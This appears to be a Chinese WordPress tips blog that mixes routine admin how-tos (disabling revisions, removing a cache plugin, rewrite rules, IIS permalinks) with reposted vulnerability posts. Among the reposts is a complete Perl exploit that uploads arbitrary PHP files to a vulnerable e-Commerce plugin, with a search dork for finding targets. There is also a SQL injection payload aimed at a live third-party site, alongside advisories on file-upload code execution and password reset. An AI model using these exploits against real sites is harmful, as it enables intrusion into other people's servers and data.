以前添加代码以屏蔽自动保存及修订的方法不能使用了。
WordPress 3.2 文章自动保存草稿和修订的关闭方法如下:
打开你正在使用主题文件夹下面的functions.php文件,在合适地方添加以下代码即可:
/* 移除自动保存和修订版本 */
remove_action('pre_post_update', 'wp_save_post_revision' );
add_action( 'wp_print_scripts', 'disable_autosave' );
function disable_autosave() {
wp_deregister_script('autosave');
}
MustLive has discovered a vulnerability in WordPress, which can be exploited by malicious users to compromise a vulnerable system.
The application improperly validates uploaded files, which can be exploited to execute arbitrary PHP code by uploading a .phtml file with e.g. an appended ".gif" file extension.
Successful exploitation requires "Author" permissions in the backend and that Apache is not configured to handle the mime-type for media files with e.g. a ".jpg" or ".gif" extension.
The vulnerability is confirmed in version 3.1.2. Other versions may also be affected.
Solution
Restrict access to the wp-content/uploads directory (e.g. via .htaccess).
Provided and/or discovered by
MustLive
Original Advisory
http://websecurity.com.ua/5108/
安装了Wp Super Cache,导致wp-postviews不能正常统计文章浏览次数。
解决办法:
如果你不再用Wp Super Cache这个插件,请按以下方法将其卸除:
在后台禁用此插件。
删除/wp-content/plugins/目录的wp-super-cache目录。
删除wp-content目录下面的cache目录。
删除wp-content目录下面的wp-config.php ,advanced-cache.php两个文件。
修改wp-config.php,把下面一行删掉即可:
define(’WP_CACHE’, true);
想想似乎是在安装wp-super-cache后wp-postviews就不能工作了。虽然把wp-super-cache删出了,但任然不能工作。
经过测试后发现原来是在wp-super-cache安装时往wp-config.php文件中写入了一个定义语句:
define( 'WP_CACHE', true );
,删除后wp-postviews恢复正常。
WP Super Cache 基本介绍
WP Super Cache 是 WordPress 官方开发人员 Donncha 开发,是当前最高效也是最灵活的 WordPress 静态缓存插件。它直接生成 HTML 文件,这样 Apache 就不用解析 PHP 脚本,通过使用这个插件,能使得你的 WordPress 博客将显著的提速。
这个插件是基于 Ricardo Galli Granada 的 WP-Cache 2。WP-Cache 2 可以缓存你的 WordPress 博客使得不用再次访问数据库,但是它产生的是 PHP 文件而不是 HTML 文件,所以还需要 PHP 引擎去解析它们。而 WP Super Cache 则直接产生 HTML 文件,所以服务器不用解析甚至一行 PHP 代码,所以缓存之后的速度就和访问你服务器上的一张图片一样快。
WP Super Cache 是如何工作的
一半常规的缓存办法是手工把动态页面保存为 HTML 代码,WP Super Cache 也是通过同样的方式的,但是通过自动的方式完成这个过程。
当你一个访问者来的你的站点,他没有登入或者也没有留言,这样他得到是一个在 WordPress cache 文件夹下的 supercache 子文件夹下的纯静态文件,其实你都可以自己到上面的 supercache 目录下去查看同样的永久链接的 HTML 文件的备份。判断一个页面是否已经被缓存了,查看该页面的源代码,看看最后一行是否有 < !– super cache –> 或者 < !– super cache gz –>。
如果访问者已经登陆或者留了言,就会返回 WP Cache 函数生成的页面,并且最后一行会有 < !– Cached page served by WP-Cache — >
阅读全文...
============================================================
Wordpress Plugin WP-Syntax < = 0.9.1 Remote Command Execution
============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
WP-Syntax - This is the most popular plugin for wordpress to highlight the code. It is used on many sites, such as Stefan Esser uses it on his blog. For me this plugin is of interest, as found in his blog quite a large farm-partnerki. Following an analysis of source code, I found quite unusual vulnerability, therefore, decided to create a separate topic. Probably somebody have comments or thoughts about a more elegant solution.
WP-Syntax uses the library GeSHi, which implements all the functionality to review the syntax and appropriate for each language html-code. Having reviewed the main script plugin wp-syntax.php, I moved to the folder test, where the 2 scripts: index.php and code.php. Code.php contains code examples for different languages, and leads them to the index.php illumination to demonstrate the capacity of the plug-in. Index.php inkludit wp-syntax.php, which in turn connects geshi.php. According to the developer wp-syntax.php can be called only in the context of WP, while the test / index.php can be run independently of the platform, the author decided to use samopalnoe WP likeness of a mechanism to implement the callback-function. Who is familiar with the internal device, WP, or at least see part of the code can understand what I am talking about functions add_action (), do_action (), apply_filters (), etc.
阅读全文...
可以直接重置管理员的密码,但是无法获得重置后的密码,因为重置后的密码是发到管理员信箱的,除非你把管理员的信箱也拿到。WordPress 的 trac 上也已经发了修复的信息Changeset [11797] - Changeset [11804] 。在用 WordPress 的同学来这里下载 wp-login.php 覆盖一下吧。
=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password
阅读全文...
编辑public_html目录下的.htaccess文件,加入如下语句.如果public_html下没有.htaccess文件,新建一个即可.
注意:将 yourmaindomain.com修改为你的域名,将subfolder修改为你要指向的public_html下的子目录.最后一行中的index.php修改为你的网站的主页名称.(修改粗体表示的内容,其他内容不要改动)
# .htaccess main domain to subfolder redirect
# Copy and paste the following code into the .htaccess file
# in the public_html folder of your hosting account
# make the changes to the file according to the instructions.RewriteEngine on
# Change yourdomain.com to be your main domain.RewriteCond %{HTTP_HOST} ^(www.)?yourmaindomain.com$
# Change ’subfolder’ to be the folder you will use for your main domain.
RewriteCond %{REQUEST_URI} !^/subfolder/
# Don’t change this line.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
# Change ’subfolder’ to be the folder you will use for your main domain.
RewriteRule ^(.*)$ /subfolder/$1
# Change yourdomain.com to be your main domain again.
# Change ’subfolder’ to be the folder you will use for your main domain
# followed by / then the main file for your site, index.php, index.html, etc.
RewriteCond %{HTTP_HOST} ^(www.)?yourmaindomain.com$
RewriteRule ^(/)?$ subfolder/index.php [L]
也许你早就发现了,自己wordpress博客发表文章的时候前后两篇的ID居然不连续,会很容易发现,通常前后两篇文章的ID会差个2到3的,虽然说文章ID不连续并不影响什么,但或多或少的对博客作者心情会有点影响,我刚开始就觉得很纳闷,看着就很不爽。
后来发现,原来WordPress2.6及其以后的版本添加了一个Post Revisions的功能,该功能会保存同一篇博客日志的不同版本,同样的内容多次占用数据库,因此导致了文章ID的不连续,而且浪费数据库资源。解决问题的办法就是禁止这个功能。
只要你把以下介绍的三个处理方法都用上,保证ID就可以连续了。
首先,修改wp-config.php文件,在文件中增加一行define(’WP_POST_REVISIONS’, false); 。
其次,使用“禁用WordPress自动保存的插件——Disable Revisions”,Disable Revisions可以禁止WordPress2.6以后的Post Revisions问题从而不产生多余的文章版本。
Disable Revisions下载地址:http://wordpress.org/extend/plugins/disable-revisions/
最后,对于以前已经产生的数据库中的垃圾,我们用WP Cleaner 这个插件来搞定它,WP Cleaner可以起到搜索和批量删除不再需要的wordpress文 章修订版或草稿,减小数据库的空间的作用。该插件可以在你需要使用的时候开启,使用完后禁用,如果你一开始就已经使用上面的Disable Revisions插件,则可以不用安装该插件了。如果不是的话,装上这个插件,你就会发现有很多莫名其妙的文章在你的数据库里,都可以一并删除了,当 然,安全起见,删除前建议先备份mysql数据库。
WP Cleaner下载地址:http://www.jiangmiao.org/blog/c/wpcleaner
已经发布的WordPress 2.6版有一个很讨厌的功能,就是Post Revisions(文章的版本控制),在默认的情况下,日志的ID将不再连续,使用ID做为Permalink结构的用户将会看到一个地址越来越混乱的WordPress,现在我给一个解决WordPress的ID不连续的方法。
按照此文的方法,在wp-config.php文件中增加一行define('WP_POST_REVISIONS', false),同时安装“禁用WordPress自动保存的插件”,在WordPress后台启用此插件。
请注意这两个操作缺一不可,如果不启用“禁用WordPress自动保存的插件”,那么每篇文章都会出现一个自动保存的记录。
另外,对于数据库有“洁癖”的WordPress用户来说,可能想要删除由于Post Revisions导致的表内的垃圾信息,同时将ID设置为连续,下面是我写的一段SQL脚本,请在phpmyadmin中使用。
删除是Post Revisions垃圾信息,请执行:
delete from wp_posts where post_type = 'revision';
将ID重新设置为连续,这个比较麻烦,设置一个ID就要4条SQL语句,我仅仅举一个例子,将ID为59的文章修改为ID为58,需要执行以下语句。
update wp_posts set id = 58 where id = 59;
update wp_term_relationships set object_id = 58 where object_id = 59;
update wp_postmeta set post_id = 58 where post_id = 59;
update wp_comments set comment_post_ID = 58 where comment_post_ID = 59;
如果用户需要修改的文章较多,需要批量复制、修改和执行上面四行。
WordPress Plugin e-Commerce < = 3.4 Arbitrary File Upload Exploit
#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
my $fname = rand(99999) . ".php"; # no int()
print <
Discovered && Coded by: t0pP8uZz
Discovered on: 20 October 2008
Theres no current vulnerabilitys for this plugin, but the
vulnerability explained here no longer exists in the later
versions of the plugin, due to a code rewrite.
In testing this vulnerability, i wrote a scraping content
program, and found ALOT of vulnerable sites.
This exploit will upload a selected file to the...
... /wp-content/plugins/wp-shopping-cart/ directory.
If the directory is not writable (rare cases) you can
mod this exploit and use the insecure GET variable
"imagedir" to directory traversal.. so you can upload
in diffrent directorys.
Contact: irc.rizon.net #sectalk
Dork: inurl:"/wp-content/plugins/wp-shopping-cart/"
INTRO
print "\nEnter URL(ie: http://site.com/mambo): ";
chomp(my $url=
print "\nEnter File Path(path to local file to upload): ";
chomp(my $file=
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url . '/wp-content/plugins/wp-shopping-cart/image_processing.php',
Content_Type => 'form-data',
Content => [ Submit => "Add", image => [ $file, $fname, Content_Type => 'plain/text' ], ] );
die "Exploit Failed: HTTP POST Failed!" unless $re->is_success;
if($re->content =~ /Fatal error/i) {
print "Complete! To see if exploit was successfull visit the following URL for your uploaded file.\n";
print "Uploaded File: " . $url . "/wp-content/plugins/wp-shopping-cart/" . $fname . "\n";
} else
{
print "Exploit Failed! Target host not vulnerable!\n";
}
exit;
# milw0rm.com [2008-10-29]
-------------------------------------------------------------------
WordPress Media Holder (id) Sql injetion vulnerability!
-------------------------------------------------------------------
-------------------------------------------------------------------
Author: boom3rang
Greetz: H!tM@N - KHG - chs - redc00de!
Site : www.khg-crew.ws - [Kosova Hackers Group!]
-------------------------------------------------------------------
-------------------------------------------------------------------
Dork: mediaHolder.php?id
-------------------------------------------------------------------
Exp: http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit: -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
-------------------------------------------------------------------
Proud 2 be Albanian
Proud 2 be Muslim
United States of Albania
-------------------------------------------------------------------
# milw0rm.com [2008-10-26]
为了去掉wordpress博客文章连接地址中嵌入的index.php格式,在网上一直苦苦搜索,知道有个方法可以用ISAPI_Rewrite组件实现类似linux主机apache环境的mod_rewrite的url rewrite地址重写功能,但必须要拥有服务器上运行该组件的权限,作罢。以后也就没进一步尝试其它方法。先有个伪静态地址格式也不错了。
前天尝试用英文关键词搜索,果然,对于一个代码盲来说。依赖一定的网络搜索和解决问题的能力。终于找到了win iis虚拟主机不需任何wordpress插件,不需要第三方组件完美的wordpress伪静态设置方法。当然,前提条件是服务器提供商的控制面板有自定义404错误页面的选项。
你只需创建一个404错误页面,并且写入下列4行代码即可简单优雅的实现无插件完美支持windows iis主机的永久固定链接的伪静态化地址格式。去掉网页地址中的index.php!
<?php
$qs = $_SERVER['QUERY_STRING'];
$_SERVER['REQUEST_URI'] = substr($qs, strpos($qs, ':80')+3);
$_SERVER['PATH_INFO'] = $_SERVER['REQUEST_URI'];
include('index.php');
?>
这样即可固定REQUEST_URI和PATH_INFO参量并且包括进去index.php,剩下的将交给wordpress完成任务(说实话,这参数定义代码偶也不清楚,依葫芦画瓢即可)。
具体设置步骤:
1.新建一个记事本,在里面写入上面代码,保存,连同txt格式重新命名为wp-404-handler.php。
2.设置404自定义错误指向wp-404-handler.php,一般来说,绝大多数服务器控制面板均提供该选项。
3.进入wordpress管理后台,设置(Options)-永久链接(Permalinks),你就当自己的主机是linux主机使好了,任意、随便设置自己喜欢的伪静态地址格式及静态地址后缀。
4.Enjoy!
推荐链接地址层次不要太深,并且伪静态化地址加上html/htm,不过也有人推荐不要加上伪静态后缀,因为那样搜索引擎可能会认为那种地址是一个分类目录,而不是一个具体的网页,从而获得更高的搜索排名权重,现在wordpress个人博客也比较流行那种伪静态格式。
不管怎样,你成功去掉了index.php!最后感谢英文作者einar 提供的天才设置方法!
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
近期评论